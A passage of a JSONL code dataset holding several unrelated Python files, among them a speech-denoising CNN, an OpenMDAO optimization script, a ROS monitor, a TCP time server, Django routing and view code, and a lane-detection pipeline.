use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = x + skip1\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = x + skip0\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = tf.keras.layers.SpatialDropout2D(0.2)(x)\n x = Conv2D(filters=1, kernel_size=[129,1], strides=[1, 1], padding='same')(x)\n\n model = Model(inputs=inputs, outputs=x)\n\n optimizer = tf.keras.optimizers.Adam(3e-4)\n #optimizer = RAdam(total_steps=10000, warmup_proportion=0.1, min_lr=3e-4)\n\n model.compile(optimizer=optimizer, loss='mse', \n metrics=[tf.keras.metrics.RootMeanSquaredError('rmse')])\n return model\n \n def prepare_input_features(self,stft_features):\n # Phase Aware Scaling: To avoid extreme differences (more than\n # 45 degree) between the noisy and clean phase, the clean spectral magnitude was encoded as similar to [21]:\n noisySTFT = np.concatenate([stft_features[:,0:numSegments-1], stft_features], axis=1)\n stftSegments = np.zeros((numFeatures, numSegments , noisySTFT.shape[1] - numSegments + 1))\n\n for index in range(noisySTFT.shape[1] - numSegments + 1):\n stftSegments[:,:,index] = noisySTFT[:,index:index + numSegments]\n return stftSegments\n\n def removeNoise(self,features, phase, cleanMean=None, cleanStd=None,noiseAudioFeatureExtractor=None):\n # scale the outpus back to the original range\n if cleanMean and cleanStd:\n features = cleanStd * features + cleanMean\n\n phase = np.transpose(phase, (1, 0))\n features = np.squeeze(features)\n\n # features = librosa.db_to_power(features)\n features = features * np.exp(1j * phase) # that fixes the abs() ope previously done\n\n features = np.transpose(features, (1, 0))\n return noiseAudioFeatureExtractor.get_audio_from_stft_spectrogram(features)\n\n def resample_ratecv(self,data,samplerate=48000, resample_rate=16000):\n #Resamples the given PCM stream to resample_rate.\n return audioop.ratecv((bytearray(data)), 2, 1, samplerate, resample_rate, None)\n\n def get_all_samples(self,data):\n allsamples=[]\n index=0\n while True:\n try:\n index=index+1\n sample=audioop.getsample(data,2,index)\n sample_8a = sample & 0xff\n sample_8b = (sample >> 8) & 0xff\n allsamples.append(int(str(sample_8a)))\n allsamples.append(int(str(sample_8b)))\n except:\n break;\n\n return allsamples;\n\n def __init__(self):\n print(\"Init\")\n self.model = self.build_model(l2_strength=0.0)\n self.model.load_weights(os.path.dirname(__file__)+'./model/cnn-audio.h5')\n\n def reduceNoiseMain(self,noisyAudio):\n noiseAudioFeatureExtractor = FeatureExtractor(noisyAudio, windowLength=windowLength, overlap=overlap, sample_rate=16000)\n noise_stft_features = noiseAudioFeatureExtractor.get_stft_spectrogram()\n noisyPhase = np.angle(noise_stft_features)\n noise_stft_features = np.abs(noise_stft_features)\n\n mean = np.mean(noise_stft_features)\n std = np.std(noise_stft_features)\n noise_stft_features = (noise_stft_features - mean) / std\n\n predictors = self.prepare_input_features(noise_stft_features)\n predictors = np.reshape(predictors, (predictors.shape[0], predictors.shape[1], 1, predictors.shape[2]))\n predictors = np.transpose(predictors, (3, 0, 1, 2)).astype(np.float32)\n\n STFTFullyConvolutional = self.model.predict(predictors)\n\n denoisedAudioFullyConvolutional = self.removeNoise(STFTFullyConvolutional, noisyPhase, mean, std,noiseAudioFeatureExtractor)\n\n from scipy.io.wavfile import write as scipyWrite\n scipyWrite('tmp_f.wav', 16000, denoisedAudioFullyConvolutional)\n\n \n #Test if it worked\n # sd.play(data=noisyAudio , samplerate= fs)\n\n # import matplotlib.pyplot as plt\n\n # f, (ax2, ax3) = plt.subplots(2, 1, sharey=True)\n # ax2.plot(noisyAudio)\n # ax2.set_title(\"Noisy Audio\")\n\n # ax3.plot(denoisedAudioFullyConvolutional)\n # ax3.set_title(\"Denoised Audio\")\n\n # f.show()\n\n","sub_path":"Audio/SpeechDenoiserCNN/SpeechDenoiser.py","file_name":"SpeechDenoiser.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"91962467","text":"\"\"\" Optimization of the CADRE MDP.\"\"\"\n\nfrom __future__ import print_function\nfrom six.moves import range\n\nimport numpy as np\n\nfrom openmdao.core.mpi_wrap import MPI\nfrom openmdao.core.problem import Problem\nfrom openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver\n\ntry:\n from openmdao.core.petsc_impl import PetscImpl as impl\nexcept ImportError:\n impl = None\n\nfrom openmdao.solvers.ln_gauss_seidel import LinearGaussSeidel\nfrom openmdao.solvers.petsc_ksp import PetscKSP\n\nfrom CADRE.CADRE_mdp import CADRE_MDP_Group\n\n# These numbers are for the CADRE problem in the paper.\nn = 1500\nm = 300\nnpts = 6\nrestart = False\n\n# These numbers are for quick testing\n#n = 150\n#m = 6\n#npts = 2\n\n\n# Instantiate\nmodel = Problem(impl=impl)\nroot = model.root = CADRE_MDP_Group(n=n, m=m, npts=npts)\n\n# add SNOPT driver\nmodel.driver = pyOptSparseDriver()\nmodel.driver.options['optimizer'] = \"SNOPT\"\nmodel.driver.opt_settings = {'Major optimality tolerance': 1e-3,\n 'Major feasibility tolerance': 1.0e-5,\n 'Iterations limit': 500000000}\n\n# Add parameters and constraints to each CADRE instance.\nnames = ['pt%s' % i for i in range(npts)]\nfor i, name in enumerate(names):\n\n # add parameters to driver\n model.driver.add_desvar(\"%s.CP_Isetpt\" % name, lower=0., upper=0.4)\n model.driver.add_desvar(\"%s.CP_gamma\" % name, lower=0, upper=np.pi/2.)\n model.driver.add_desvar(\"%s.CP_P_comm\" % name, lower=0., upper=25.)\n model.driver.add_desvar(\"%s.iSOC\" % name, indices=[0], lower=0.2, upper=1.)\n\n model.driver.add_constraint('%s.ConCh'% name, upper=0.0)\n model.driver.add_constraint('%s.ConDs'% name, upper=0.0)\n model.driver.add_constraint('%s.ConS0'% name, upper=0.0)\n model.driver.add_constraint('%s.ConS1'% name, upper=0.0)\n model.driver.add_constraint('%s_con5.val'% name, equals=0.0)\n\n# Add Parameter groups\nmodel.driver.add_desvar(\"bp1.cellInstd\", lower=0., upper=1.0)\nmodel.driver.add_desvar(\"bp2.finAngle\", lower=0., upper=np.pi/2.)\nmodel.driver.add_desvar(\"bp3.antAngle\", lower=-np.pi/4, upper=np.pi/4)\n\n# Add objective\nmodel.driver.add_objective('obj.val')\n\n# For Parallel exeuction, we must use KSP or LinearGS\n#model.root.ln_solver = PetscKSP()\nmodel.root.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt0.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt1.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt2.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt3.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt4.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt5.ln_solver = LinearGaussSeidel()\n\n# Parallel Derivative calculation\nfor con_name in ['.ConCh','.ConDs','.ConS0','.ConS1','_con5.val']:\n model.driver.parallel_derivs(['%s%s'%(n,con_name) for n in names])\n\n# Recording\n# Some constraints only exit on one process so cannot record everything\nrecording_includes_options = ['obj.val']\nfor j in range(npts):\n recording_includes_options.append('pt%s.ConCh' % str(j))\n recording_includes_options.append('pt%s.ConDs' % str(j))\n recording_includes_options.append('pt%s.ConS0' % str(j))\n recording_includes_options.append('pt%s.ConS1' % str(j))\n recording_includes_options.append('pt%s_con5.val' % str(j))\n\nfrom openmdao.recorders.sqlite_recorder import SqliteRecorder\nrec = SqliteRecorder(out='data.sql')\nmodel.driver.add_recorder(rec)\nrec.options['includes'] = recording_includes_options\nrec.options['record_derivs'] = False\n\nmodel.setup()\nmodel.run()\n\nimport resource\nprint(\"Memory Usage:\", resource.getrusage(resource.RUSAGE_SELF).ru_maxrss/1000.0, \"MB (on unix)\")\n\n#----------------------------------------------------------------\n# Below this line, code I was using for verifying and profiling.\n#----------------------------------------------------------------\n#profile = False\n#params = list(model.driver.get_desvars().keys())\n#unks = list(model.driver.get_objectives().keys()) + list(model.driver.get_constraints().keys())\n#if profile is True:\n# import cProfile\n# import pstats\n# def zzz():\n# for j in range(1):\n# model.run()\n# cProfile.run(\"model.calc_gradient(params, unks, mode='rev', return_format='dict')\", 'profout')\n# #cProfile.run(\"zzz()\", 'profout')\n# p = pstats.Stats('profout')\n# p.strip_dirs()\n# p.sort_stats('cumulative', 'time')\n# p.print_stats()\n# print('\\n\\n---------------------\\n\\n')\n# p.print_callers()\n# print('\\n\\n---------------------\\n\\n')\n# p.print_callees()\n#else:\n# #model.check_total_derivatives()\n# Ja = model.calc_gradient(params, unks, mode='rev', return_format='dict')\n# for key1, value in sorted(Ja.items()):\n# for key2 in sorted(value.keys()):\n# print(key1, key2)\n# print(value[key2])\n# #print(Ja)\n# #Jf = model.calc_gradient(params, unks, mode='fwd', return_format='dict')\n# #print(Jf)\n# #Jf = model.calc_gradient(params, unks, mode='fd', return_format='dict')\n# #print(Jf)\n# import pickle\n# pickle.dump(Ja, open( \"mdp_derivs.p\", \"wb\" ))\n#\n#import pickle\n#data = {}\n#varlist = []\n#picklevars = ['obj.val',\n #'pt0_con1.val', 'pt0_con2.val', 'pt0_con3.val', 'pt0_con4.val', 'pt0_con5.val',\n #'pt1_con1.val', 'pt1_con2.val', 'pt1_con3.val', 'pt1_con4.val', 'pt1_con5.val',\n #]\n#for var in picklevars:\n #data[var] = model[var]\n#pickle.dump(data, open( \"mdp_execute.p\", \"wb\" ))\n","sub_path":"example_mdp.py","file_name":"example_mdp.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"69651523","text":"#!/usr/bin/env python\nimport rospy\nimport sys\nimport json\nimport yaml\nimport websocket\nfrom threading import *\nfrom rospy_message_converter import message_converter\nfrom monitor.msg import *\nfrom std_msgs.msg import String\n\nws_lock = Lock()\ndict_msgs = {}\nfrom gazebo_radiation_plugins.msg import Simulated_Radiation_Msg\n\ndef callback_radiation_sensor_plugin_sensor_0(data):\n\tglobal ws, ws_lock\n\trospy.loginfo('monitor has observed: ' + str(data))\n\tdict = message_converter.convert_ros_message_to_dictionary(data)\n\tdict['topic'] = '/radiation_sensor_plugin/sensor_0'\n\tdict['time'] = rospy.get_time()\n\tws_lock.acquire()\n\twhile dict['time'] in dict_msgs:\n\t\tdict['time'] += 0.01\n\tws.send(json.dumps(dict))\n\tdict_msgs[dict['time']] = data\n\tws_lock.release()\n\trospy.loginfo('event propagated to oracle')\npub_dict = {}\nmsg_dict = { '/radiation_sensor_plugin/sensor_0' : \"gazebo_radiation_plugins/Simulated_Radiation_Msg\"}\ndef monitor():\n\tglobal pub_error, pub_verdict\n\twith open(log, 'w') as log_file:\n\t\tlog_file.write('')\n\trospy.init_node('radiation_monitor_orange', anonymous=True)\n\tpub_error = rospy.Publisher(name = 'radiation_monitor_orange/monitor_error', data_class = MonitorError, latch = True, queue_size = 1000)\n\tpub_verdict = rospy.Publisher(name = 'radiation_monitor_orange/monitor_verdict', data_class = String, latch = True, queue_size = 1000)\n\trospy.Subscriber('/radiation_sensor_plugin/sensor_0', Simulated_Radiation_Msg, callback_radiation_sensor_plugin_sensor_0)\n\trospy.loginfo('monitor started and ready')\ndef on_message(ws, message):\n\tglobal error, log, actions\n\tjson_dict = json.loads(message)\n\tif json_dict['verdict'] == 'true' or json_dict['verdict'] == 'currently_true' or json_dict['verdict'] == 'unknown':\n\t\tif json_dict['verdict'] == 'true' and not pub_dict:\n\t\t\trospy.loginfo('The monitor concluded the satisfaction of the property under analysis, and can be safely removed.')\n\t\t\tws.close()\n\t\t\texit(0)\n\t\telse:\n\t\t\tlogging(json_dict)\n\t\t\ttopic = json_dict['topic']\n\t\t\trospy.loginfo('The event ' + message + ' is consistent and republished')\n\t\t\tif topic in pub_dict:\n\t\t\t\tpub_dict[topic].publish(dict_msgs[json_dict['time']])\n\t\t\tdel dict_msgs[json_dict['time']]\n\telse:\n\t\tlogging(json_dict)\n\t\tif (json_dict['verdict'] == 'false' and actions[json_dict['topic']][1] >= 1) or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] == 1):\n\t\t\trospy.loginfo('The event ' + message + ' is inconsistent..')\n\t\t\terror = MonitorError()\n\t\t\terror.topic = json_dict['topic']\n\t\t\terror.time = json_dict['time']\n\t\t\terror.property = json_dict['spec']\n\t\t\terror.content = str(dict_msgs[json_dict['time']])\n\t\t\tpub_error.publish(error)\n\t\t\tif json_dict['verdict'] == 'false' and not pub_dict:\n\t\t\t\trospy.loginfo('The monitor concluded the violation of the property under analysis, and can be safely removed.')\n\t\t\t\tws.close()\n\t\t\t\texit(0)\n\t\tif actions[json_dict['topic']][0] != 'filter':\n\t\t\tif json_dict['verdict'] == 'currently_false':\n\t\t\t\trospy.loginfo('The event ' + message + ' is consistent ')\n\t\t\ttopic = json_dict['topic']\n\t\t\tif topic in pub_dict:\n\t\t\t\tpub_dict[topic].publish(dict_msgs[json_dict['time']])\n\t\t\tdel dict_msgs[json_dict['time']]\n\t\terror = True\n\tpub_verdict.publish(json_dict['verdict'])\n\ndef on_error(ws, error):\n\trospy.loginfo(error)\n\ndef on_close(ws):\n\trospy.loginfo('### websocket closed ###')\n\ndef on_open(ws):\n\trospy.loginfo('### websocket is open ###')\n\ndef logging(json_dict):\n\ttry:\n\t\twith open(log, 'a+') as log_file:\n\t\t\tlog_file.write(json.dumps(json_dict) + '\\n')\n\t\trospy.loginfo('event logged')\n\texcept:\n\t\trospy.loginfo('Unable to log the event.')\n\ndef main(argv):\n\tglobal log, actions, ws\n\tlog = '/media/angelo/WorkData/git/radiation_ws/src/monitor/log_radiation_orange.txt' \n\tactions = {\n\t\t'/radiation_sensor_plugin/sensor_0' : ('log', 1)\n\t}\n\tmonitor()\n\twebsocket.enableTrace(False)\n\tws = websocket.WebSocketApp(\n\t\t'ws://127.0.0.1:8080',\n\t\ton_message = on_message,\n \n\t\ton_error = on_error,\n\t\ton_close = on_close,\n\t\ton_open = on_open)\n\tws.run_forever()\n\nif __name__ == '__main__':\n\tmain(sys.argv)","sub_path":"monitor/src/radiation_monitor_orange.py","file_name":"radiation_monitor_orange.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"99897251","text":"# -*- coding: utf-8 -*-\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom sys import stdin\r\nimport itertools\r\n\r\nimport time\r\nfd = open('d.txt')\r\nstdin = fd\r\nstart=time.time()\r\n\r\n############################################\r\n\r\n# read data for n sequences.\r\ntemp = stdin.readline().split()\r\nN = int(temp[0])\r\nM = int(temp[1])\r\n\r\nA = stdin.readline().split()\r\ncard = []\r\nfor i in A:\r\n card.append(int(i))\r\ncard=sorted(card)\r\n#print(card)\r\n\r\ndata = []\r\nfor i in range(M):\r\n write = stdin.readline().split()\r\n data.append(write)\r\n\r\nfor sousa in data:\r\n # sort card every time\r\n card=sorted(card)\r\n for i in range(int(sousa[0])):\r\n if card[i] < int(sousa[1]):\r\n card[i] = int(sousa[1])\r\n else:\r\n break\r\n\r\nprint(sum(card))\r\n\r\nprint(time.time()-start)","sub_path":"abc127/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"646134698","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport socket # socket模块\r\nimport datetime\r\n\r\nHOST = '0.0.0.0'\r\nPORT = 3434\r\n\r\n# AF_INET说明使用IPv4地址, SOCK_STREAM指明TCP协议\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((HOST, PORT)) # 绑定IP与端口\r\ns.listen(1) # 监听\r\n\r\nwhile True:\r\n conn, addr = s.accept() # 接收TCP连接,并返回新的socket\r\n print('Client %s connected!' % str(addr)) # 输出客户端的IP地址\r\n dt = datetime.datetime.now()\r\n message = \"Current time is \" + str(dt)\r\n conn.send(message.encode('utf8')) # 给客户端发送当前时间\r\n print(\"Sent: \", message)\r\n conn.close() # 关闭连接\r\n","sub_path":"code/chapter02/2-1_server.py","file_name":"2-1_server.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"224327214","text":"\"\"\"monstertracker URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom monstertracker import views\r\n\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('list/', views.apiOverview),\r\n path('test/', views.testCalculateProfit),\r\n path('sortedProfit/', views.sortedProfit),\r\n path('monsters/', views.monsters),\r\n path('calculateProfit/', views.calculateProfit),\r\n path('updateProfit/', views.updateProfit),\r\n path('monster//', views.monster)\r\n]\r\n","sub_path":"monstertracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"16995981","text":"import numpy as np\nimport cv2\nfrom CameraCalibration import ReadCameraCalibrationMatrix, UndistortImage\nfrom ImageSourceGrabber import ImageSourceGrabber\nfrom PerspectiveTransformer import PerspectiveTransformer\nfrom ImageThresholder import ImageThresholder\nfrom LaneDetector import LaneDetector\nimport matplotlib.pyplot as plt\nfrom ImageSourceGrabber import ImageSourceGrabber\nfrom VideoSourceGrabber import VideoSourceGrabber\n\n#Read the camera calibration matrix\ncameraMatrix, distCoeffs = ReadCameraCalibrationMatrix()\n\nsrc_top_right = [713, 449]\nsrc_bottom_right = [1101, 623]\nsrc_bottom_left = [224, 623]\nsrc_top_left = [582, 449]\n\n# dst_top_right = [907, 449]\n# dst_bottom_right = [907, 623]\n# dst_bottom_left = [403, 623]\n# dst_top_left = [403, 449]\n\n#Original\n# dst_top_right = [1120, 90]\n# dst_bottom_right = [1120, 630]\n# dst_bottom_left = [160, 630]\n# dst_top_left = [160, 90]\n\ndst_top_right = [1120, 0]\ndst_bottom_right = [1120, 720]\ndst_bottom_left = [160, 720]\ndst_top_left = [160, 0]\n\n\ndef PrepareColoredThresholdedImage(thresholded_image):\n thresholded_image_left = thresholded_image.copy() * 255\n thresholded_image_right = thresholded_image.copy() * 255\n thresholded_image_left[:, int(thresholded_image.shape[1] / 2):thresholded_image.shape[1]] = 0\n thresholded_image_right[:,0:int(thresholded_image.shape[1]/2)] = 0\n colored_image = np.dstack((thresholded_image_right,np.zeros_like(thresholded_image),thresholded_image_left))\n return colored_image\n\n\ndef Pipeline(image):\n # Initialize perspective transformer\n perspectiveTransformer = PerspectiveTransformer(\n np.float32([src_top_right, src_bottom_right, src_bottom_left, src_top_left]),\n np.float32([dst_top_right, dst_bottom_right, dst_bottom_left, dst_top_left])\n )\n\n # Initialize image thresholder\n thresholder = ImageThresholder()\n\n # Initialize histogram\n laneDetector = LaneDetector()\n\n #Perform image undistortion\n undistorted_image = UndistortImage(image, cameraMatrix, distCoeffs)\n\n #Perform perspective transform\n perspective_transformed = perspectiveTransformer.TransformImage(undistorted_image)\n\n #Perform thresholding\n thresholded_image, _, _, _, _, _, _ = thresholder.Perform(perspective_transformed)\n\n #Calculate the histogram\n centroids = laneDetector.FindWindowCentroids(thresholded_image)\n centroids_image = laneDetector.DrawWindowCentroids(thresholded_image, centroids)\n left_poly, right_poly = laneDetector.FitAPolyline(thresholded_image, centroids)\n poly_region_image = laneDetector.DrawPolylines(undistorted_image, left_poly, right_poly)\n radius_left = laneDetector.FindRadiusOfCurvature(left_poly, 720)\n radius_right = laneDetector.FindRadiusOfCurvature(right_poly, 720)\n curvature = (radius_left + radius_right) / 2.0\n center = laneDetector.CarPosition(left_poly, right_poly)\n\n #Apply inverse transform on lane region\n lane_detector_region = perspectiveTransformer.InverseTransformImage(poly_region_image)\n\n pipeline_output = cv2.addWeighted(undistorted_image, 1, lane_detector_region, 0.3, 0)\n\n\n return pipeline_output, undistorted_image, thresholded_image, perspective_transformed, centroids_image, poly_region_image, lane_detector_region, curvature, center\n\n\nif __name__ == \"__main__\":\n #Create the image grabber\n #imageGrabber = ImageSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/test_images\")\n imageGrabber = VideoSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/project_video.mp4\")\n # imageGrabber = VideoSourceGrabber(\"/home/engin/Documents/new_clip.mov\")\n # imageGrabber = VideoSourceGrabber(\"/home/engin/sub2.mov\")\n #imageGrabber = VideoSourceGrabber(\"/home/engin/sub3.mov\")\n #imageGrabber = VideoSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/challenge_video.mp4\")\n\n imageGrabber.Init()\n\n counter = 0\n while imageGrabber.HasNext():\n image = imageGrabber.GrabImage()\n if image is None:\n break\n #image = cv2.imread(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/test_images/test3.jpg\")\n\n pipeline_output, undistorted_image, thresholded_image, \\\n image, centroids_image, poly_image, \\\n lane_detector_region, curvature, center = Pipeline(image)\n\n cv2.putText(pipeline_output, \"Curvature: {0:.2f} m\".format(curvature), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)\n cv2.putText(pipeline_output, \"Center: {0:.2f} m\".format(center), (10, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 255, 255), 1)\n\n\n cv2.imshow(\"ThresholdedImage\", thresholded_image * 255)\n cv2.imshow(\"Image\", image)\n cv2.imshow(\"Centroids\", centroids_image)\n cv2.imshow(\"PolylineImage\", poly_image)\n cv2.imshow(\"LaneDetectorRegion\", lane_detector_region)\n cv2.imshow(\"Weighted\", pipeline_output)\n\n cv2.imwrite(\"./test_images_out/{}.png\".format(counter), pipeline_output)\n counter = counter + 1\n cv2.waitKey(10)\n","sub_path":"LaneFindingPipeline.py","file_name":"LaneFindingPipeline.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"48846400","text":"\r\nfrom django import template\r\n#代替safe\r\nfrom django.utils.safestring import mark_safe\r\nregister = template.Library()\r\nimport re\r\n\r\ndef make_url(s_url):\r\n '''\r\n 通用组织url的参数\r\n :param s_url:\r\n :return: url前面的路径,和后面的参数字典,重新组合:\"&\".join(param_dict.values()\r\n '''\r\n param_dict = {}\r\n path_info = s_url.split(\"?\")\r\n if len(path_info) == 2:\r\n path_info,params_str=path_info\r\n else:\r\n params_str = \"\"\r\n\r\n if params_str:\r\n params = params_str.split(\"&\")\r\n for param in params:\r\n key, value = param.split(\"=\")\r\n param_dict[key] = \"%s=%s\" % (key, value)\r\n else:\r\n param_dict={}\r\n return path_info,param_dict\r\n\r\n\r\n@register.simple_tag\r\ndef make_url_for_delete(s_url,d_path,action,bid):\r\n '''\r\n 传入url,生成url,为delete组织url\r\n action 操作:删除/放入回收站\r\n bid 编号\r\n '''\r\n\r\n path_info,param_dict=make_url(s_url)\r\n\r\n param_dict[\"action\"]=\"action=%s\"%(action)\r\n param_dict[\"bid\"]=\"bid=%s\"%(bid)\r\n\r\n params=\"&\".join(param_dict.values())\r\n\r\n\r\n\r\n\r\n\r\n\r\n # for k,v in url.items():\r\n # param_dict[k]=\"%s=%s\"%(k,v)\r\n # param_dict[\"_page\"]=\"%s=%s\"%(\"_page\",page_value)\r\n #\r\n # print(param_dict)\r\n # url=\"%s?%s\"%(url,\"&\".join(param_dict.values()))\r\n\r\n url=\"%s?%s\"%(d_path,params)\r\n return url\r\n","sub_path":"backend/templatetags/template_tools.py","file_name":"template_tools.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524518864","text":"import requests\nimport traceback\nfrom Classes.Reader import Read_APIs\nfrom Classes.Api_Compare import Api_Compare\n\nimport json\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n\nclass Read_Compare_Api_Response():\n def Get_Request(self):\n count = 0\n for j in range (len(L1)):\n for k in range (len(L2)):\n if j == k:\n try :\n request1 = requests.get(L1[j])\n request2 = requests.get(L2[k])\n print(request1, request2)\n except :\n print(\"Catch Exception--> [Something went wrong]\")\n print(traceback.format_exc())\n\n try :\n with open(\"Data/Response1.txt\", 'w') as inputfile_1:\n json.dump(request1.json(),inputfile_1,indent = 4,ensure_ascii = False)\n inputfile_1.close()\n except ValueError :\n print(\"Catch Exception --> json.decoder.JSONDecodeError : API request did not fetch any response from request1 \\n\")\n #print(traceback.format_exc())\n\n try:\n with open(\"Data/Response2.txt\", 'w') as inputfile_2:\n json.dump(request2.json(), inputfile_2 ,indent=4, ensure_ascii=False)\n inputfile_2.close()\n except ValueError :\n print(\"Catch Exception --> json.decoder.JSONDecodeError : API request did not fetch any response for request2 \\n \")\n #print(traceback.format_exc())\n\n M = Api_Compare.Compare_Request(self)\n\n if 0 not in M:\n print(L1[j] + \" equals \" + L2[k])\n count = count + 1\n\n else:\n print(L1[j] + \" not equals \" + L2[k])\n count = count + 1\n\n\nif __name__ == \"__main__\":\n Req = Read_APIs\n L1 = Req.List_URL1\n L2 = Req.List_URL2\n cmd_file1,cmd_file2 = sys.argv[1], sys.argv[2]\n Req.Read_File1(Read_APIs,cmd_file1)\n Req.Read_File2(Read_APIs,cmd_file2)\n Obj = Read_Compare_Api_Response.Get_Request(Read_Compare_Api_Response)","sub_path":"Classes/Comparator.py","file_name":"Comparator.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"446223946","text":"\nWS = 25\n\n\ndef do_it(filename):\n with open(filename) as f:\n lines = list(map(int, f))\n for i in range(WS + 1, len(lines)):\n s = set(lines[i - WS:i])\n for j in s:\n if (lines[i] - j) in s:\n break\n else:\n return i, lines[i]\n\n\nif __name__ == '__main__':\n output = do_it('091.txt')\n print(f'Result: {output}')\n\n# Result: 22477624\n","sub_path":"2020/09/091.py","file_name":"091.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"176265954","text":"import markdown\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http.response import HttpResponse, HttpResponseForbidden\nfrom django.views.generic.base import View\nfrom wkhtmltopdf.views import PDFTemplateView\n\nfrom trans.models import User, ContentVersion, Translation, Task\n\n\nclass VersionDownloadMixin(object):\n def get_file_format(self):\n return self.file_format\n\n def get_version(self):\n version_id = self.request.GET['id']\n content_version = ContentVersion.objects.filter(id=version_id).first()\n return content_version\n\n # TODO I MUST refactor this method\n def get_version_text(self):\n content_type_model = self.request.GET.get('type', None)\n id = self.request.GET['id']\n user = User.objects.get(username=self.request.user.username)\n if content_type_model:\n task = Task.objects.filter(id=id).first()\n if task is None or task.contest.public == False:\n return None\n if content_type_model == 'translation':\n translation = Translation.objects.filter(user=user, task=task).first()\n if translation is None or translation.user != user:\n return None\n return translation.get_latest_text()\n elif content_type_model == 'task':\n return task.get_published_text()\n else:\n return None\n\n content_version = ContentVersion.objects.filter(id=id).first()\n if not content_version.can_view_by(user):\n return None\n return content_version.text\n\n # TODO I MUST refactor this method\n def get_filename(self):\n # version = self.get_version()\n # obj = version.content_object\n # created = version.create_time\n # return \"%s_%d-%d-%d %d:%d.%s\" % (obj.title, created.year, created.month, created.day,\n # created.hour, created.minute, self.get_file_format())\n content_type_model = self.request.GET.get('type', None)\n id 